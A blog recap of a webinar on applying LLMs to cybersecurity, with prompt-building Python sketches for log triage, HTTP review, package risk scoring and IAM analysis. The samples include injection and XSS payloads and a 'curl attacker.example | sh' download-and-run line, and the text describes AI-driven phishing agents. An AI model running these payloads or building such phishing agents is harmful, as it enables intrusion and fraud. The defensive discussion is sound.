ChatGPT is just the beginning. New AI tools are launching often, and new tools bring new functionality. With the long history of machine learning being used as part of cybersecurity, how are recent developments in AI and LLMs (Large Language Models) becoming part of the cybersecurity landscape? How can AI tools make cybersecurity practices more efficient? And will AI replace cybersecurity? (Spoiler alert: it won't.)
As part of our CloudSec 360 series, Wiz spoke with Clint Gibler, Head of Security Research at Semgrep (and the founder of the tldrsec.com newsletter). Clint joined us to discuss several use cases for AI in the cybersecurity space, and to share his own ideas about how security experts can leverage AI tools to their advantage.
Clint’s top observations:
AI can help with some problems, in some ways, if used correctly.
AI doesn’t work perfectly every time; it’s a tool that we can use to do our work more quickly, easily, and cheaply.
AI doesn’t make everything perfect; the point is to use it like any other tool, in an attempt to solve real problems.
Definitions and concepts around AI and LLMs
To establish a shared understanding among the webinar audience, Clint started his talk with a quick definition of Large Language Models. You can think of LLMs as next-word auto-complete apps: they’re essentially trained by taking a huge amount of data from the internet (such as Wikipedia, Stack Overflow, textbooks, etc.) and combining it with a lot of compute and training time. The result is a surprisingly smart model! Some primary players in the LLM space are OpenAI (maker of ChatGPT), Google’s Bard, Anthropic’s Claude, and Hugging Face (an AI community collaboration platform).
An AI prompt has a few core components: a user persona (security expert, lawyer, etc.), a task (analyze the following code), and data (code, logs, user reviews). Clint also defined the following terms in context of AI:
Few-shot prompting: Guiding the model with a small number of example inputs that show what you want the model to do. For example, if you’re trying to categorize a log as malicious or not, you might include a couple of lines and say, “this is bad/this is safe.”
Context window: How much text you can give an LLM at one time; an active area of research.
Vector DB: At times you'll be working with more text than you can fit within a 4000-token limit. You might want to store it in a Vector DB, where you can index content from PDFs, transcripts, code bases, your company’s docs or internal KB, etc. You want to be able to have the LLM easily reference those items and use them as context in its answers.
Retrieval Augmented Generation: A fancy term for a way to automatically concatenate relevant or supporting information into your prompt.
Agent: You may want to go beyond one request and response; you may want the LLM to do some planning or map out multiple steps at once. This is referred to as using the LLM as an agent.
Tools: You might want to give agents the ability to do more than just analyze text: for example, performing a Google search, making an API request, or running some code.
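Putting a few of these concepts together, here’s a minimal, hypothetical sketch (no particular LLM library is assumed, and the model call itself is omitted) of how a prompt combining a persona, a task, a few labeled examples (few-shot prompting), and the data to analyze might be assembled:

```python
# Hypothetical sketch: assemble a prompt from the core components above --
# a persona, a task, few-shot examples, and the data to be analyzed.

def build_fewshot_prompt(persona, task, examples, data):
    """Concatenate persona, task, few-shot examples, and the input data."""
    lines = [f"You are {persona}.", task, ""]
    for text, label in examples:  # few-shot: show the model what we want
        lines.append(f"Log: {text}\nVerdict: {label}\n")
    lines.append(f"Log: {data}\nVerdict:")
    return "\n".join(lines)

prompt = build_fewshot_prompt(
    persona="an expert security analyst",
    task="Classify each log line as 'malicious' or 'safe'.",
    examples=[
        ("GET /index.html 200", "safe"),
        ("GET /etc/passwd%00.png 404", "malicious"),
    ],
    data="POST /login?user=admin'-- 500",
)
# `prompt` would then be sent to the model of your choice.
```

The model completes the final “Verdict:” line, which is exactly the few-shot pattern Clint described for labeling logs.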
Use cases: how AI is used, and how it could be used
Next, Clint moved on to a list of various use cases; specifically, those where AI can be used in a security context (both by people attacking systems and people defending them). Clint’s examples were plentiful and fascinating. We’ll discuss some — but not all — of them here. (For his full list of examples, we encourage you to watch the full webinar!)
Most companies creating LLMs try to design them in a way that prevents them from being used for criminal activity, but there are exceptions. Cybercriminals have found ways to use generative AI for phishing. Although many phishing attempts are easy to spot, the tools are becoming more sophisticated. One striking example of AI persuasion is Meta’s CICERO, an AI agent that was highly effective at playing the game Diplomacy. The agent was able to persuade, negotiate, and cooperate with people; in fact, it attained double the average score of human players on webdiplomacy.net. Similarly, an LLM agent can be directed to scrape an individual’s social media profiles, send a tailored phishing message to that person, and engage with them if they respond. Fortunately, there are companies working on products designed to distinguish AI-generated content from human-generated content. But, as Clint says, “it’s a cat and mouse game,” as other tools are being designed to make AI content undetectable.
Moving on to web security: Clint has noticed a couple of Burp Suite extensions that leverage LLMs to analyze HTTP requests and responses and search for potential security issues within them. Spokespeople from Tenable said that one of these extensions was able to successfully find cross-site scripting and misconfigured HTTP headers. Clint suggested that this type of tool would be useful if it could be expanded. For example, these extensions could look at sequences of requests (such as the checkout flow on an ecommerce site, or an OAuth or SAML protocol). Imagine passing the specifications for those protocols (the RFCs) to an LLM to show it what various requests mean, or which parameters are important. The LLM could then potentially make interesting observations about those sequences. Furthermore, if an agent were directed to make HTTP requests itself, it could observe behavior and tweak parameters. Clint then described a project designed to automatically generate an OpenAPI Specification from source code, using Semgrep to extract routes and parameters and an LLM to infer the types of parameters.
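As a rough illustration of that Burp-extension pattern, here’s a hypothetical sketch that packages one HTTP request/response pair into a review prompt. The wording is an assumption, not any extension’s actual implementation, and sending the prompt to a model is left out:

```python
# Hypothetical sketch: format an HTTP exchange into a prompt asking an LLM
# to flag issues such as reflected XSS or misconfigured security headers.
# This function only builds text; no model is called here.

def build_http_review_prompt(request, response):
    return (
        "You are an expert web security researcher.\n"
        "Review the HTTP exchange below and list any potential security "
        "issues (e.g. XSS, missing or misconfigured security headers), "
        "citing the exact request or response line each issue comes from.\n\n"
        f"--- Request ---\n{request}\n\n"
        f"--- Response ---\n{response}"
    )

request = ("GET /search?q=<script>alert(1)</script> HTTP/1.1\n"
           "Host: shop.example")
response = ("HTTP/1.1 200 OK\nContent-Type: text/html\n\n"
            "Results for <script>alert(1)</script>")
prompt = build_http_review_prompt(request, response)
```

The same structure extends naturally to Clint’s sequence idea: instead of one exchange, the prompt could carry an ordered list of exchanges from a checkout or OAuth flow.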
Clint has seen several companies working on detecting malicious open-source packages, although “how they all work is a little bit different.” In this example, imagine that you’re continuously watching package managers like npm and PyPI. As new packages emerge, you analyze them with a lightweight static analysis tool, then pass them to an LLM along with some combination of the following: a persona (an expert cybersecurity researcher), the capabilities the package exhibits (like writing to the file system or making network requests), and metadata (similarities to the names of other packages, or the age of the publishing account on the package manager). Perhaps your tooling has already flagged some of the source code as suspicious. You could combine some set of these factors and then ask the LLM to assign a risk rating to the package, scoring its likelihood of being malware from 0-10. (A human would then probably triage this assessment.)
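That triage pipeline can be sketched in a few lines. Everything here is hypothetical — the field names, the example typosquat, and the prompt wording are all illustrative, and the model call is omitted:

```python
# Hypothetical sketch: combine persona, observed capabilities, metadata, and
# flagged code into one prompt asking for a 0-10 malware risk score.

def build_risk_prompt(pkg_name, capabilities, metadata, flagged_code):
    parts = [
        "You are an expert cybersecurity researcher reviewing a new package.",
        f"Package: {pkg_name}",
        "Capabilities observed: " + ", ".join(capabilities),
    ]
    parts += [f"{key}: {value}" for key, value in metadata.items()]
    if flagged_code:
        parts.append("Source code flagged by static analysis:")
        parts.extend(flagged_code)
    parts.append("Rate the likelihood that this package is malware from "
                 "0-10, then justify your score.")
    return "\n".join(parts)

prompt = build_risk_prompt(
    "requessts",  # hypothetical typosquat of "requests"
    capabilities=["network requests", "filesystem writes"],
    metadata={"publisher_account_age_days": 2, "name_similar_to": "requests"},
    flagged_code=["os.system('curl http://attacker.example | sh')"],
)
# A human analyst would then triage whatever score the model returns.
```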
With a threat modeling tool like STRIDE GPT, you provide a description of your app and specify what kind of data it processes. STRIDE GPT then spits out a threat model, an attack tree, and/or some mitigating controls. Because threat modeling is text heavy, this is a great use case for LLMs. But what else could AI do for threat modeling? Could we programmatically pull in the description of the app (the scope doc)? Could a lightweight code analysis also be gathered automatically? Could we collect everything we need, present it to the user, ask them if it’s right, let them edit it, and then submit it? With this idea, the goal is not for the output to be perfect, but to save time, as editing is generally easier and faster than writing from scratch. Clint’s conclusion: “even if it’s not perfect; if we’re saving people a lot of time, I think that’s still a win.”
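A STRIDE GPT-style request could look something like the following hypothetical sketch. The prompt wording is illustrative, not the tool’s actual prompt, and the model call is omitted:

```python
# Hypothetical sketch: an app description and data classification go in,
# and a request for a STRIDE threat model comes out.

def build_threat_model_prompt(app_description, data_types):
    return (
        "You are an experienced threat modeler.\n"
        f"Application: {app_description}\n"
        f"Data processed: {', '.join(data_types)}\n"
        "Produce a STRIDE threat model, an attack tree, and suggested "
        "mitigating controls. The output will be reviewed and edited "
        "by a human."
    )

prompt = build_threat_model_prompt(
    "A multi-tenant SaaS invoicing app with a public REST API",
    ["PII", "payment card data"],
)
```

Note the last line of the prompt: it bakes in the point Clint kept returning to — a draft that a human edits is still a big time savings over a blank page.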
In the cloud security space, a tool called EscalateGPT queries the AWS API, returns a bunch of IAM policies, passes them to OpenAI, and asks it to look for privilege escalation. In testing against real-world AWS environments, users found that GPT-4 managed to identify complex privilege-escalation scenarios based on non-trivial policies spanning multiple IAM accounts. Clint says he’d be curious to see a benchmark of how well this tool does against existing tools that were hand-coded for the same purpose.
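The shape of that pattern is simple enough to sketch by hand. This is a hypothetical illustration, not EscalateGPT’s actual code: the policy is hard-coded (in practice you’d fetch policies via the AWS API), and the model call is omitted. The `iam:CreatePolicyVersion` permission on `"*"` is a well-known escalation primitive, since it lets a user rewrite a policy to grant themselves anything:

```python
import json

# Hypothetical sketch of the EscalateGPT pattern: serialize IAM policies
# into a prompt asking an LLM to find privilege-escalation paths.

policies = [
    {"PolicyName": "dev-helper",
     "Document": {"Version": "2012-10-17",
                  "Statement": [{"Effect": "Allow",
                                 "Action": ["iam:CreatePolicyVersion"],
                                 "Resource": "*"}]}},
]

def build_privesc_prompt(policies):
    return (
        "You are an expert cloud security researcher.\n"
        "Examine the following AWS IAM policies and identify any "
        "privilege-escalation paths, explaining each step:\n"
        + json.dumps(policies, indent=2)
    )

prompt = build_privesc_prompt(policies)
```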
For fuzzing to be effective, we need good code coverage — the more code you’re exercising, the more likely you are to find bugs. Clint's idea is to take your existing fuzzing infrastructure and ask, “where don’t we have good coverage today?” You might pass that to an LLM that generates code and writes fuzzing test harnesses for you; then you might execute more functions in parts of the code that you haven’t exercised yet. Clint cited a blog from Google on AI-Powered Fuzzing as an interesting resource.
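Clint’s coverage-driven idea can be sketched as two small steps: find the functions your fuzzers never reach, then ask an LLM to draft a harness for each. In this hypothetical illustration the coverage data is hard-coded and the model call is omitted:

```python
# Hypothetical sketch: pick uncovered functions, then build a prompt asking
# an LLM to write a fuzzing harness for each one.

def pick_uncovered(functions, covered):
    """Return the functions with no fuzz coverage today."""
    return [f for f in functions if f not in covered]

def build_harness_prompt(signature):
    return (
        "You are an expert in fuzzing.\n"
        f"Write a libFuzzer harness that exercises: {signature}\n"
        "Output only compilable C++ code."
    )

targets = pick_uncovered(
    ["parse_header(const uint8_t*, size_t)", "checksum(const char*)"],
    covered={"checksum(const char*)"},
)
prompts = [build_harness_prompt(t) for t in targets]
```

In a real setup, the generated harnesses would be compiled and run, and the resulting coverage fed back into `pick_uncovered` on the next iteration.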
Clint's reflections on AI
The possibilities for AI within cybersecurity are seemingly endless; but AI is not a catch-all solution. It can help with some problems, in some ways, when it’s used correctly. And even if it doesn't work perfectly, it can be used to make a lot of work faster, easier, and cheaper. Clint suggests thinking of AI as a tool, like any other tool, that can be used to solve real user problems.
Dive deeper into Clint’s examples, ideas, and resources
Watch the full webinar to hear Clint’s comprehensive, thoughtful talk on AI and cybersecurity!